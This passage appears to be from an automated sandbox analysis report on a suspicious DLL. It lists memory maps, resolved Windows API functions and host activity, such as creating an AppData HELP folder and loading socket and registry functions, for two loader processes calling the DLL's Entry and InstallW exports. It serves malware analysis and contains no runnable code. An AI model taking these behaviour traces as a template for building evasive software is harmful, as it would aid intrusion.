| nsi.dll | 0x762d0000 | 0x762d5fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| sechost.dll | 0x762e0000 | 0x762f8fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| shlwapi.dll | 0x76300000 | 0x76356fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| lpk.dll | 0x765f0000 | 0x765f9fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| advapi32.dll | 0x76700000 | 0x7679ffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| shell32.dll | 0x767a0000 | 0x773e9fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| usp10.dll | 0x773f0000 | 0x7748cfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| ws2_32.dll | 0x77510000 | 0x77544fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| rpcrt4.dll | 0x77550000 | 0x775f0fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| msvcrt.dll | 0x77720000 | 0x777cbfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| ole32.dll | 0x77970000 | 0x77acbfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| user32.dll | 0x77ad0000 | 0x77b98fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| msctf.dll | 0x77ba0000 | 0x77c6bfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| gdi32.dll | 0x77c80000 | 0x77ccdfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| apisetschema.dll | 0x77e80000 | 0x77e80fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| ntdll.dll | 0x77ec0000 | 0x77ffbfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| pagefile_0x000000007f6f0000 | 0x7f6f0000 | 0x7f7effff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x000000007ffb0000 | 0x7ffb0000 | 0x7ffd2fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| private_0x000000007ffda000 | 0x7ffda000 | 0x7ffdafff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x000000007ffdf000 | 0x7ffdf000 | 0x7ffdffff | Private Memory | Readable, Writable |
|
|
|
- |
Host Behavior
File (9)
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | C:\Windows\system32\win.com | desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Windows\system32\kernel32.dll | desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create Directory | C:\Users\EEBsYm5\AppData\Roaming\HELP | - |
|
1 | |
| Create Directory | C:\Users\EEBsYm5\AppData\Roaming\HELP\system32\ | - |
|
1 | |
| Get Info | C:\Windows\system32\win.com | type = time |
|
1 | |
| Get Info | C:\Windows\system32\kernel32.dll | type = time |
|
1 | |
| Open | STD_INPUT_HANDLE | - |
|
1 | |
| Open | STD_OUTPUT_HANDLE | - |
|
1 | |
| Open | STD_ERROR_HANDLE | - |
|
1 |
Module (101)
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Load | kernel32.dll | base_address = 0x761d0000 |
|
2 | |
| Load | ws2_32.dll | base_address = 0x77510000 |
|
1 | |
| Load | advapi32.dll | base_address = 0x76700000 |
|
1 | |
| Load | msvcrt.dll | base_address = 0x77720000 |
|
1 | |
| Load | user32.dll | base_address = 0x77ad0000 |
|
1 | |
| Get Handle | c:\windows\system32\kernel32.dll | base_address = 0x761d0000 |
|
12 | |
| Get Filename | - | process_name = c:\windows\system32\gorctexxzx.exe, file_name_orig = C:\Windows\System32\goRcteXxZX.exe, size = 260 |
|
6 | |
| Get Filename | - | process_name = c:\windows\system32\gorctexxzx.exe, file_name_orig = C:\Users\EEBsYm5\Desktop\97328F~1.DLL, size = 260 |
|
3 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FlsAlloc, address_out = 0x7622418d |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FlsGetValue, address_out = 0x76221e16 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FlsSetValue, address_out = 0x762276e6 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FlsFree, address_out = 0x76221f61 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = EncodePointer, address_out = 0x77f1a295 |
|
8 | |
| Get Address | c:\windows\system32\kernel32.dll | function = DecodePointer, address_out = 0x77f1cd10 |
|
3 | |
| Get Address | c:\windows\system32\kernel32.dll | function = IsProcessorFeaturePresent, address_out = 0x762276b5 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetProcAddress, address_out = 0x762233d3 |
|
2 | |
| Get Address | c:\windows\system32\ws2_32.dll | function = WSAStartup, address_out = 0x77513ab2 |
|
1 | |
| Get Address | c:\windows\system32\ws2_32.dll | function = WSACleanup, address_out = 0x77513c5f |
|
1 | |
| Get Address | c:\windows\system32\ws2_32.dll | function = gethostbyname, address_out = 0x77527673 |
|
1 | |
| Get Address | c:\windows\system32\ws2_32.dll | function = inet_ntoa, address_out = 0x7751b131 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CreateFileA, address_out = 0x7621cee8 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = WriteFile, address_out = 0x76221400 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CloseHandle, address_out = 0x7621ca7c |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FindFirstFileA, address_out = 0x76222d89 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FindNextFileA, address_out = 0x7621a187 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FindClose, address_out = 0x76220e62 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = DeleteFileA, address_out = 0x762147cb |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FileTimeToSystemTime, address_out = 0x76221dfe |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = SetFilePointer, address_out = 0x7621db36 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CreateProcessA, address_out = 0x761d2082 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = WaitForSingleObject, address_out = 0x7621ba90 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = ReadFile, address_out = 0x762196fb |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CreateEventW, address_out = 0x76223386 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetSystemDirectoryA, address_out = 0x76218fc5 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetWindowsDirectoryW, address_out = 0x762104b6 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetTempPathA, address_out = 0x76236a65 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetTempPathW, address_out = 0x76208b33 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetLocalTime, address_out = 0x7621a90e |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetComputerNameW, address_out = 0x762103ff |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetSystemInfo, address_out = 0x76223728 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetVersionExW, address_out = 0x76213b1a |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetEnvironmentVariableA, address_out = 0x7621ce2e |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CopyFileA, address_out = 0x7623532c |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetLastError, address_out = 0x7621bf00 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = SetFileAttributesA, address_out = 0x76208cb9 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetFileSize, address_out = 0x76210273 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CreateDirectoryA, address_out = 0x762368da |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = TerminateProcess, address_out = 0x76212331 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = LoadLibraryW, address_out = 0x76223c01 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = LoadLibraryA, address_out = 0x7622395c |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = MultiByteToWideChar, address_out = 0x7622452b |
|
1 | |
| Get Address | c:\windows\system32\advapi32.dll | function = RegCreateKeyExA, address_out = 0x76711469 |
|
1 | |
| Get Address | c:\windows\system32\advapi32.dll | function = RegEnumValueA, address_out = 0x7670cf49 |
|
1 | |
| Get Address | c:\windows\system32\advapi32.dll | function = RegDeleteValueA, address_out = 0x7672a4ea |
|
1 | |
| Get Address | c:\windows\system32\advapi32.dll | function = RegCloseKey, address_out = 0x7671469d |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = memset, address_out = 0x77729790 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = memcpy, address_out = 0x77729910 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = memcmp, address_out = 0x77737975 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = malloc, address_out = 0x77729cee |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = free, address_out = 0x77729894 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = strchr, address_out = 0x7772dbeb |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = strncpy, address_out = 0x777308a9 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = atoi, address_out = 0x7772dbe0 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = _snwprintf, address_out = 0x777495d1 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = strncat, address_out = 0x77750909 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = strstr, address_out = 0x7772de4a |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = strlen, address_out = 0x777343d3 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = strrchr, address_out = 0x7772dbae |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = _snprintf, address_out = 0x7774fa7c |
|
1 | |
| Get Address | c:\windows\system32\user32.dll | function = OemToCharA, address_out = 0x77b2f041 |
|
1 | |
| Get Address | c:\windows\system32\user32.dll | function = wsprintfA, address_out = 0x77ae3f47 |
|
1 | |
| Get Address | c:\windows\system32\user32.dll | function = wsprintfW, address_out = 0x77af426d |
|
1 |
System (5)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Time | type = System Time, time = 2018-04-29 13:06:25 (UTC) |
|
2 | |
| Get Time | type = Ticks, time = 94801 |
|
1 | |
| Get Info | type = System Directory, result_out = C:\Windows\system32 |
|
2 |
Environment (3)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Environment String | - |
|
1 | |
| Get Environment String | name = APPDATA, result_out = C:\Users\EEBsYm5\AppData\Roaming |
|
2 |
Process #16: gorctexxzx.exe
125
0
| Information | Value |
|---|---|
| ID | #16 |
| File Name | c:\windows\system32\gorctexxzx.exe |
| Command Line | "C:\Windows\System32\goRcteXxZX.exe" /dll="C:\Users\EEBsYm5\Desktop\97328F~1.DLL" /fn_id=Entry /fn_args="0" |
| Initial Working Directory | C:\Windows\system32\ |
| Monitor | Start Time: 00:00:31, Reason: Child Process |
| Unmonitor | End Time: 00:02:29, Reason: Terminated by Timeout |
| Monitor Duration | 00:01:58 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0xb10 |
| Parent PID | 0xa3c (c:\windows\system32\gorctexxzx.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | High (Elevated) |
| Username | CRH2YWU7\EEBsYm5 |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
B14
0x
DE0
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x0000000000010000 | 0x00010000 | 0x0002ffff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000000010000 | 0x00010000 | 0x0001ffff | Pagefile Backed Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000020000 | 0x00020000 | 0x00020fff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000000030000 | 0x00030000 | 0x00033fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x0000000000040000 | 0x00040000 | 0x00040fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| locale.nls | 0x00050000 | 0x000b6fff | Memory Mapped File | Readable |
|
|
|
- |
| private_0x00000000000c0000 | 0x000c0000 | 0x000c0fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000130000 | 0x00130000 | 0x0013ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x00000000001b0000 | 0x001b0000 | 0x002affff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000320000 | 0x00320000 | 0x0041ffff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000000420000 | 0x00420000 | 0x004e7fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x00000000004f0000 | 0x004f0000 | 0x005f0fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| private_0x0000000000600000 | 0x00600000 | 0x0075ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000760000 | 0x00760000 | 0x0097ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000820000 | 0x00820000 | 0x0091ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000940000 | 0x00940000 | 0x0097ffff | Private Memory | Readable, Writable |
|
|
|
- |
| gorctexxzx.exe | 0x011d0000 | 0x011f0fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| pagefile_0x0000000001200000 | 0x01200000 | 0x01dfffff | Pagefile Backed Memory | Readable |
|
|
|
- |
| api-ms-win-core-synch-l1-2-0.dll | 0x72db0000 | 0x72db2fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| 97328f~1.dll | 0x72ee0000 | 0x72f24fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| kernelbase.dll | 0x75f70000 | 0x75fb9fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| kernel32.dll | 0x761d0000 | 0x762a3fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| imm32.dll | 0x762b0000 | 0x762cefff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| nsi.dll | 0x762d0000 | 0x762d5fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| sechost.dll | 0x762e0000 | 0x762f8fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| shlwapi.dll | 0x76300000 | 0x76356fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| lpk.dll | 0x765f0000 | 0x765f9fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| advapi32.dll | 0x76700000 | 0x7679ffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| shell32.dll | 0x767a0000 | 0x773e9fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| usp10.dll | 0x773f0000 | 0x7748cfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| ws2_32.dll | 0x77510000 | 0x77544fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| rpcrt4.dll | 0x77550000 | 0x775f0fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| msvcrt.dll | 0x77720000 | 0x777cbfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| ole32.dll | 0x77970000 | 0x77acbfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| user32.dll | 0x77ad0000 | 0x77b98fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| msctf.dll | 0x77ba0000 | 0x77c6bfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| gdi32.dll | 0x77c80000 | 0x77ccdfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| apisetschema.dll | 0x77e80000 | 0x77e80fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| ntdll.dll | 0x77ec0000 | 0x77ffbfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| pagefile_0x000000007f6f0000 | 0x7f6f0000 | 0x7f7effff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x000000007ffb0000 | 0x7ffb0000 | 0x7ffd2fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| private_0x000000007ffd6000 | 0x7ffd6000 | 0x7ffd6fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x000000007ffde000 | 0x7ffde000 | 0x7ffdefff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x000000007ffdf000 | 0x7ffdf000 | 0x7ffdffff | Private Memory | Readable, Writable |
|
|
|
- |
Host Behavior
File (9)
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | C:\Windows\system32\win.com | desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Windows\system32\kernel32.dll | desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create Directory | C:\Users\EEBsYm5\AppData\Roaming\HELP | - |
|
1 | |
| Create Directory | C:\Users\EEBsYm5\AppData\Roaming\HELP\system32\ | - |
|
1 | |
| Get Info | C:\Windows\system32\win.com | type = time |
|
1 | |
| Get Info | C:\Windows\system32\kernel32.dll | type = time |
|
1 | |
| Open | STD_INPUT_HANDLE | - |
|
1 | |
| Open | STD_OUTPUT_HANDLE | - |
|
1 | |
| Open | STD_ERROR_HANDLE | - |
|
1 |
Module (108)
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Load | kernel32.dll | base_address = 0x761d0000 |
|
2 | |
| Load | ws2_32.dll | base_address = 0x77510000 |
|
1 | |
| Load | advapi32.dll | base_address = 0x76700000 |
|
1 | |
| Load | msvcrt.dll | base_address = 0x77720000 |
|
1 | |
| Load | user32.dll | base_address = 0x77ad0000 |
|
1 | |
| Get Handle | c:\windows\system32\kernel32.dll | base_address = 0x761d0000 |
|
15 | |
| Get Filename | - | process_name = c:\windows\system32\gorctexxzx.exe, file_name_orig = C:\Windows\System32\goRcteXxZX.exe, size = 260 |
|
6 | |
| Get Filename | - | process_name = c:\windows\system32\gorctexxzx.exe, file_name_orig = C:\Users\EEBsYm5\Desktop\97328F~1.DLL, size = 260 |
|
3 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FlsAlloc, address_out = 0x7622418d |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FlsGetValue, address_out = 0x76221e16 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FlsSetValue, address_out = 0x762276e6 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FlsFree, address_out = 0x76221f61 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = EncodePointer, address_out = 0x77f1a295 |
|
9 | |
| Get Address | c:\windows\system32\kernel32.dll | function = DecodePointer, address_out = 0x77f1cd10 |
|
6 | |
| Get Address | c:\windows\system32\kernel32.dll | function = IsProcessorFeaturePresent, address_out = 0x762276b5 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetProcAddress, address_out = 0x762233d3 |
|
2 | |
| Get Address | c:\windows\system32\ws2_32.dll | function = WSAStartup, address_out = 0x77513ab2 |
|
1 | |
| Get Address | c:\windows\system32\ws2_32.dll | function = WSACleanup, address_out = 0x77513c5f |
|
1 | |
| Get Address | c:\windows\system32\ws2_32.dll | function = gethostbyname, address_out = 0x77527673 |
|
1 | |
| Get Address | c:\windows\system32\ws2_32.dll | function = inet_ntoa, address_out = 0x7751b131 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CreateFileA, address_out = 0x7621cee8 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = WriteFile, address_out = 0x76221400 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CloseHandle, address_out = 0x7621ca7c |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FindFirstFileA, address_out = 0x76222d89 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FindNextFileA, address_out = 0x7621a187 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FindClose, address_out = 0x76220e62 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = DeleteFileA, address_out = 0x762147cb |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FileTimeToSystemTime, address_out = 0x76221dfe |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = SetFilePointer, address_out = 0x7621db36 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CreateProcessA, address_out = 0x761d2082 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = WaitForSingleObject, address_out = 0x7621ba90 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = ReadFile, address_out = 0x762196fb |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CreateEventW, address_out = 0x76223386 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetSystemDirectoryA, address_out = 0x76218fc5 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetWindowsDirectoryW, address_out = 0x762104b6 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetTempPathA, address_out = 0x76236a65 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetTempPathW, address_out = 0x76208b33 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetLocalTime, address_out = 0x7621a90e |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetComputerNameW, address_out = 0x762103ff |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetSystemInfo, address_out = 0x76223728 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetVersionExW, address_out = 0x76213b1a |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetEnvironmentVariableA, address_out = 0x7621ce2e |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CopyFileA, address_out = 0x7623532c |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetLastError, address_out = 0x7621bf00 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = SetFileAttributesA, address_out = 0x76208cb9 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetFileSize, address_out = 0x76210273 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CreateDirectoryA, address_out = 0x762368da |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = TerminateProcess, address_out = 0x76212331 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = LoadLibraryW, address_out = 0x76223c01 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = LoadLibraryA, address_out = 0x7622395c |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = MultiByteToWideChar, address_out = 0x7622452b |
|
1 | |
| Get Address | c:\windows\system32\advapi32.dll | function = RegCreateKeyExA, address_out = 0x76711469 |
|
1 | |
| Get Address | c:\windows\system32\advapi32.dll | function = RegEnumValueA, address_out = 0x7670cf49 |
|
1 | |
| Get Address | c:\windows\system32\advapi32.dll | function = RegDeleteValueA, address_out = 0x7672a4ea |
|
1 | |
| Get Address | c:\windows\system32\advapi32.dll | function = RegCloseKey, address_out = 0x7671469d |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = memset, address_out = 0x77729790 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = memcpy, address_out = 0x77729910 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = memcmp, address_out = 0x77737975 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = malloc, address_out = 0x77729cee |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = free, address_out = 0x77729894 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = strchr, address_out = 0x7772dbeb |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = strncpy, address_out = 0x777308a9 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = atoi, address_out = 0x7772dbe0 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = _snwprintf, address_out = 0x777495d1 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = strncat, address_out = 0x77750909 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = strstr, address_out = 0x7772de4a |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = strlen, address_out = 0x777343d3 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = strrchr, address_out = 0x7772dbae |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = _snprintf, address_out = 0x7774fa7c |
|
1 | |
| Get Address | c:\windows\system32\user32.dll | function = OemToCharA, address_out = 0x77b2f041 |
|
1 | |
| Get Address | c:\windows\system32\user32.dll | function = wsprintfA, address_out = 0x77ae3f47 |
|
1 | |
| Get Address | c:\windows\system32\user32.dll | function = wsprintfW, address_out = 0x77af426d |
|
1 |
System (5)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Time | type = System Time, time = 2018-04-29 13:06:25 (UTC) |
|
2 | |
| Get Time | type = Ticks, time = 94864 |
|
1 | |
| Get Info | type = System Directory, result_out = C:\Windows\system32 |
|
2 |
Environment (3)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Environment String | - |
|
1 | |
| Get Environment String | name = APPDATA, result_out = C:\Users\EEBsYm5\AppData\Roaming |
|
2 |
Process #17: gorctexxzx.exe
129
0
| Information | Value |
|---|---|
| ID | #17 |
| File Name | c:\windows\system32\gorctexxzx.exe |
| Command Line | "C:\Windows\System32\goRcteXxZX.exe" /dll="C:\Users\EEBsYm5\Desktop\97328F~1.DLL" /fn_id=InstallW /fn_args="0" |
| Initial Working Directory | C:\Windows\system32\ |
| Monitor | Start Time: 00:00:32, Reason: Child Process |
| Unmonitor | End Time: 00:02:29, Reason: Terminated by Timeout |
| Monitor Duration | 00:01:57 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0xb1c |
| Parent PID | 0xa3c (c:\windows\system32\gorctexxzx.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | High (Elevated) |
| Username | CRH2YWU7\EEBsYm5 |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
B20
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x0000000000010000 | 0x00010000 | 0x0002ffff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000000010000 | 0x00010000 | 0x0001ffff | Pagefile Backed Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000020000 | 0x00020000 | 0x00020fff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000000030000 | 0x00030000 | 0x00033fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x0000000000040000 | 0x00040000 | 0x00040fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| locale.nls | 0x00050000 | 0x000b6fff | Memory Mapped File | Readable |
|
|
|
- |
| private_0x00000000000c0000 | 0x000c0000 | 0x000c0fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000170000 | 0x00170000 | 0x0017ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x00000000001f0000 | 0x001f0000 | 0x002effff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x00000000002f0000 | 0x002f0000 | 0x003b7fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| private_0x00000000003e0000 | 0x003e0000 | 0x004dffff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x00000000004e0000 | 0x004e0000 | 0x005e0fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| private_0x00000000005f0000 | 0x005f0000 | 0x007bffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x00000000007c0000 | 0x007c0000 | 0x009effff | Private Memory | Readable, Writable |
|
|
|
- |
| gorctexxzx.exe | 0x011d0000 | 0x011f0fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| pagefile_0x0000000001200000 | 0x01200000 | 0x01dfffff | Pagefile Backed Memory | Readable |
|
|
|
- |
| api-ms-win-core-synch-l1-2-0.dll | 0x72db0000 | 0x72db2fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| 97328f~1.dll | 0x72ee0000 | 0x72f24fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| kernelbase.dll | 0x75f70000 | 0x75fb9fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
